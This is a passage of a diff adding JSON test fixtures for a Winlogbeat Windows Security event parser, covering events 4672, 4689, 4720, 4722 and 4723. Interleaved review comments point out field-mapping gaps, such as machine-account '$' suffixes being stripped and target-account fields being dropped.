"SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": 
"0x40c158b6", + "SubjectUserName": "USER01-WIN$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "USER01-WIN.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "USER01-WIN" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "USER01-WIN" + }, + "winlog": { + "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "USER01-WIN.domain.priv", + "event_id": "4672", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x40c158b6" + }, + "opcode": "Informations", + "process": { + "pid": 828, + "thread": { + "id": 27812 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "288206963", + "task": "Special Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json new file mode 100644 index 000000000..e5beffcf5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4689.json 
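Review bot: The expected `user.name` and `related.user` values here are "USER01-WIN", i.e. the trailing `$` of the input's `SubjectUserName` "USER01-WIN$" is stripped, and the 4689 fixture does the same for "ACCOUNT_01$". That normalisation erases the only marker distinguishing a computer account from a user account, so a rule on 4672 that treats "special privileges granted to a non-machine principal" as suspicious cannot tell the two apart from `user.name` alone; `action.properties.SubjectUserName` still has the raw value, but it is not an ECS field. If the stripping is intentional parser behaviour, consider also asserting a field that preserves the distinction (for example keeping the raw name in `user.name` and the stripped one elsewhere), or at least note the trade-off in the PR description so the fixture does not read as an accidental loss.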
@@ -0,0 +1,88 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin 
:\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "event": { + "action": "Process Termination", + "code": "4689", + "kind": "event", + "module": "security", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:10:13.534000Z", + "action": { + "id": 4689, + "outcome": "success", + "properties": { + "ProcessId": "0x1df8", + "ProcessName": "C:\\Windows\\System32\\process.exe", + "Status": "0x0", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": 
"winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "ACCOUNT_01.domain.priv" + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\process.exe", + "name": "process.exe", + "pid": 7672 + }, + "related": { + "user": [ + "ACCOUNT_01" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT_01" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT_01.domain.priv", + "event_id": "4689", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Informations", + "process": { + "pid": 4, + "thread": { + "id": 620 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1564712", + "task": "Process Termination" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json new file mode 100644 index 000000000..96e08b538 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4720.json 
@@ -0,0 +1,127 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":
612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}" + }, + "expected": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD 
Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "code": "4720", + "kind": "event", + "module": "security", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "creation", + "user" + ] + }, + "@timestamp": "2024-11-12T04:47:02.389000Z", + "action": { + "id": 4720, + "outcome": "success", + "properties": { + "AccountExpires": "%%1794", + "AllowedToDelegateTo": "-", + "DisplayName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "LogonHours": "%%1793", + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "NewUacValue": "0x214", + "OldUacValue": 
"0x0", + "PasswordLastSet": "%%1794", + "PrimaryGroupId": "513", + "PrivilegeList": "-", + "ProfilePath": "-", + "SamAccountName": "USER", + "ScriptPath": "-", + "SidHistory": "-", + "SubjectDomainName": "RESEAU-COMPANY", + "SubjectLogonId": "0x2a4b2040", + "SubjectUserName": "user-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "RESEAU-COMPANY", + "TargetSid": "S-1-2-3-4-5-6-7", + "TargetUserName": "USER", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "UserParameters": "-", + "UserPrincipalName": "USER@reseau.company", + "UserWorkstations": "-" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "name": "AGENT", + "type": "winlogbeat", + "version": "7.12.1" + }, + "host": { + "name": "HOST01.reseau.company" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "user-name" + ] + }, + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.reseau.company", + "event_data": { + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "UserAccountControl": [ + "2082", + "2084", + "2089" + ] + }, + "event_id": "4720", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x2a4b2040" + }, + "opcode": "Info", + "process": { + "pid": 612, + "thread": { + "id": 1940 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "479720536", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json new file mode 100644 index 000000000..94bd16fdf --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4722.json 
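Review bot: The expected output of this 4720 fixture has `related.user` reduced to ["user-name"] and no `user.target`, although the input's `event_data` carries `TargetUserName` "USER", `TargetSid` "S-1-2-3-4-5-6-7" and `UserPrincipalName` "USER@reseau.company", and the input's own `related.user` listed both "user-name" and "USER". The 4634 fixture earlier in this commit does populate `user.target.name`/`user.target.domain`, so the omission here looks inconsistent; for an account-creation event the created account is the primary pivot ("new account created by unexpected creator"), and a fixture that asserts its absence will lock that gap in. If the parser really drops it, extend the expected block with `"target": {"domain": "RESEAU-COMPANY", "id": "S-1-2-3-4-5-6-7", "name": "USER"}` under `user` and "USER" in `related.user` once the parser is fixed; otherwise explain the intended scope in the PR description.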
@@ -0,0 +1,111 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount 
Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4722", + "kind": "event", + "module": "security", + "original": "A user account was enabled.\n\nSubject:\n\tSecurity 
ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:53:57.535000Z", + "action": { + "id": 4722, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a13c3fc", + "SubjectUserName": "account-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "ACC_NAME" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "AA-BB-CC-DD-EE-FF" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account-name" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account-name", + "target": { + "domain": "DOMAIN", + "name": "ACC_NAME" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4722", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a13c3fc" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042939152", + "task": 
"User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json new file mode 100644 index 000000000..34874fdfb --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4723.json 
@@ -0,0 +1,112 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
